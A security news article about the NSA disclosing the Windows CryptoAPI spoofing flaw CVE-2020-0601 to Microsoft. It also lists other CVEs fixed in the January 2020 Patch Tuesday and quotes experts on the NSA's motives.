- NSA has helped Microsoft fix a highly critical Windows bug instead of keeping it for themselves.
- The problem concerns a CryptoAPI spoofing vulnerability that leads to multiple ways of exploitation.
- Microsoft has released the fixing patches today, so all Windows users are urged to apply them immediately.
The NSA (National Security Agency) has discovered a major flaw in Windows and reported it to Microsoft. This has been rumored in the last couple of days, so we were expecting to see something significant getting patched with today’s Windows update. What we didn’t expect to see was the reporting party to be the NSA, an entity that has preferred to use significant flaws for their own benefit and spying operations in the past. So, this is an event that showcases a shift in how the NSA handles security matters, although it could be just a flare.
This is a critical issue. Everyone should patch Win10/Win 2016 ASAP. Do not wait!
Also big kudos to NSA for voluntarily disclosing to Microsoft. This is the type of vuln I am sure the offensive side would have loved to use for years to come https://t.co/XOQmAdbSxC
— Dmitri Alperovitch (@DAlperovitch) January 14, 2020
The particular flaw is given the identifier CVE-2020-0601 and concerns the ability to use cryptography to sign a malicious executable, rendering it trusty for the operating system. This could potentially lead to website rerouting, files stealing, microphone activation, keystroke recording, disk wiping, ransomware installation, and anything else nasty you can think of. This is why Microsoft has pushed the fixing patch for this bug to branches of the U.S. military before the rest of us got it with today’s update.
Other critical vulnerabilities that have been addressed in this patch are the following:
- CVE-2020-0603, CVE-2020-0605, CVE-2020-0606, and CVE-2020-0646 – Four remote code execution flaws in the .NET and ASP.NET core software.
- CVE-2020-0609 and CVE-2020-0610 – Remote code execution vulnerabilities in the Windows Remote Desktop Protocol Gateway Server
- CVE-2020-0611 – Remote code execution flaw in the Windows Remote Desktop Protocol client.
- CVE-2020-0640 – Memory corruption vulnerability in the Internet Explorer web browser.
Apart from the above, today’s patch also fixes another 41 vulnerabilities that are classified as “important”, so applying the update should be an absolute priority for all Windows users right now. Also, this is the final patch that Windows 7 and Windows Server 2008/2008 R2 users will get.
As for what industry experts have to say about NSA’s decision to share their discovery with Microsoft, here’s what Chris Morales of Vectra told us: “NSA may have reported this flaw to MS because there was a concern that others would find this vulnerability themselves, and it was dangerous enough to warrant remediation instead of weaponizing. Or it just could be the NSA already has enough other methods for compromising a Windows system and doesn’t need it.”
Rick Holland, the Vice President of Digital Shadows thinks that: “It would be a mistake to think that NSA is changing direction. They will continue to hoard zero-days and leverage them as required to accomplish their objectives.”